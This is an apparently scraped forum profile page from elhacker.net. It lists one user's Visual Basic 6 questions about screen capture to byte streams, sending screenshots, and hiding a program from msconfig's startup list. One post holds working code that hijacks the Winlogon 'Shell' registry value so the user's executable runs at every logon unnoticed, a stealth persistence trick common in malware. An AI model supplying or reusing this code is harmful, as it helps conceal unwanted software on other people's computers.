elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: [1] 2 3
1  Programación / Programación Visual Basic / Capturescreen is stream help:S en: 12 Enero 2013, 15:04 pm
capturescreen desktop to stream help.
2  Programación / Programación Visual Basic / Re: Take screenshot of byte help? en: 22 Diciembre 2012, 00:08 am
Capturescreen to byte. help
3  Programación / Programación Visual Basic / Re: Take screenshot of byte help? en: 20 Diciembre 2012, 15:01 pm
I want to send and receive a picture of the screen without winsock Picturebox
4  Programación / Programación Visual Basic / Take screenshot of byte help? en: 20 Diciembre 2012, 07:47 am
visual basic 6 take screenshot of byte?
sample project  give me?
5  Programación / Programación Visual Basic / Re: LoadImageStream Help ? en: 17 Diciembre 2012, 17:43 pm
thank you. :)
6  Programación / Programación Visual Basic / LoadImageStream Help ? en: 16 Diciembre 2012, 16:34 pm
Hello firends.

Visual basic 6 : LoadImageStream Function And sample project could you give


Thank you in advance

7  Programación / Programación Visual Basic / Re: Msconfig hide add to startup en: 9 Agosto 2012, 17:01 pm
Will you add msn to ask a few questions : harmmylogger@hotmail.com
8  Programación / Programación Visual Basic / Re: Msconfig hide add to startup en: 9 Agosto 2012, 16:03 pm
Does it work on my project after restarting the computer?
9  Programación / Programación Visual Basic / Re: Msconfig hide add to startup en: 9 Agosto 2012, 09:19 am
Thanks :) my project
Código
  1. Private Declare Function RegOpenKeyEx Lib "advapi32" Alias "RegOpenKeyExA" (ByVal HKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, ByRef phkResult As Long) As Long
  2. Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal HKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
  3. Private Declare Function RegCloseKey Lib "advapi32" (ByVal HKey As Long) As Long
  4.  
  5.  
  6. Private Const HKEY_CURRENT_USER = &H80000001
  7. Private Const HKEY_LOCAL_MACHINE = &H80000002
  8. Private Const KEY_WRITE = &H20006
  9. Private Const REG_SZ = 1
  10.  
  11. Private Function Baslangica_Ekle_MsConfige_Gozukmeden()
  12. Dim sMyPath As String
  13. sMyPath = (App.Path & "\" & App.EXEName & ".exe")
  14. Call Dosyayi_Baslangica_Ekle(HKEY_LOCAL_MACHINE, "shell", "explorer.exe," & sMyPath, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon")
  15. End Function
  16.  
  17. Private Sub Dosyayi_Baslangica_Ekle(ByVal HKey As Long, ByVal MKey As String, ByVal stringKeyVal As String, ByVal subkey As String)
  18. Dim HRKey As Long, StrB As String
  19. Dim retval As Long
  20.    retval = RegOpenKeyEx(HKey, subkey, 0, KEY_WRITE, HRKey)
  21.        If retval <> 0 Then
  22.            Exit Sub
  23.        End If
  24.    StrB = stringKeyVal & vbNullChar
  25.    retval = RegSetValueEx(HRKey, MKey, 0, REG_SZ, ByVal StrB, Len(StrB))
  26.    RegCloseKey HRKey
  27. End Sub
10  Programación / Programación Visual Basic / Re: Msconfig hide add to startup en: 8 Agosto 2012, 18:12 pm
Can you give a sample project?
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines